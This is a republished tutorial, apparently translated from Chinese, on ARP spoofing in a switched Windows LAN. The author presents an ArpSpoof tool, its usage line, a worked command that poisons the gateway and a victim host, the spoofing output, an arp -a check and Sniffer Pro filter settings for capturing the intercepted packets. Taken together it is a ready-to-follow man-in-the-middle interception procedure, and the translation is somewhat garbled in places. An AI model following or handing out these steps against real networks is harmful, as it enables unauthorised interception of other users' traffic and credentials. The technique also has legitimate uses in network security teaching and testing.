Implementation of ARP Sniffer in Windows switching Environment

Source: Internet
Author: User

Source: ChinaITLab

According to the Sniffer implementation principle in the switching environment (For details, refer to the Sniffer implementation in the switching environment), I wrote an Arp Sniffer implementation similar to the ArpSpoof implementation in the Linux environment.
  
In Windows, Sniffer must meet the following requirements:
  
1. Install the Winpcap driver.
  
2. I wrote an ArpSpoof similar to the Linux environment (I have tested it only in Windows 2000 Server, and I look forward to your testing ).
  
3. A Sniffer, such as NetXray or NAI Sniffer Pro (recommended ).
  
Specific implementation methods:
  
Use ArpSpoof to implement ARP-based spoofing:
  
C:> arpspoof.exe
ARPSpoof, by netXeyes, Special Thanks BB
Www.netXeyes.com 2002, dansnow@21cn.com
  
Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
   
  
Spoof IP1 and Spoof IP2 are IP addresses for spoofing and sniffing, the Own IP address is your Own IP address (note that the three IP addresses must not span the vswitch or vro within the same LAN ).
  
For example, the company's LAN environment is 192.168.0.xxx, The subnet mask is 255.255.255.0, And the gateway is 192.168.0.1. Our IP address is 192.168.0.29 and we want the packet Sniffer 192.168.0.2.
  
Because the gateway is 192.168.0.1, we only need to cheat 192.168.0.1 and 192.168.0.2. In other words, tell 192.168.0.1 that the MAC address of 192.168.0.2 is itself (192.168.0.29), then tell 192.168.0.2 that the MAC address of 192.168.0.1 is itself (192.168.0.29 ). In this way, all data packets are sent to 192.168.0.29 and forwarded by 192.168.0.29. (For windows 2000, packet forwarding is enabled by default. For Windows 9. I have not tested x and Windows NT/XP. I hope you can tell me ).
  
C:> arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29
ARPSpoof, by netXeyes, Special Thanks BB
Www.netXeyes.com 2002, dansnow@21cn.com
  
Begin Spoof .........
  
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
........................................ .............
  
It is time to start ARP spoofing on 192.168.0.1 and 192.168.0.2. On 192.168.0.1, run the arp-a command to check that the MAC addresses of 192.168.0.2 and 192.168.0.29 are the same.
  
C:> arp-
  
Interface: 192.168.0.1 on Interface 0x1000004
Internet Address Physical Address Type
192.168.0.2 00-00-86-61-6b-4e dynamic
192.168.0.29 00-00-86-61-6b-4e dynamic
  
The MAC addresses of 192.168.0.1 and 192.168.0.29 are the same on 192.168.0.2.
  
In this way, ARP spoofing is implemented between 192.168.0.1 and 192.168.0.2.
  
Start Sniffer Pro and select Hardware in Address Type in Define Filter (Be sure not to select the normal Type IP Address; otherwise, you cannot find anything meaningful ), set Station1 and Station2 to Any.
  
  
Sniffer starts at this time.
  
  
The above results are successfully tested in my LAN environment and are not necessarily applicable to all environments.
  
I got a lot of assistance from BB in the development and testing process, which delayed the time for reading gossip news. I felt guilty for a long time ......:-)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.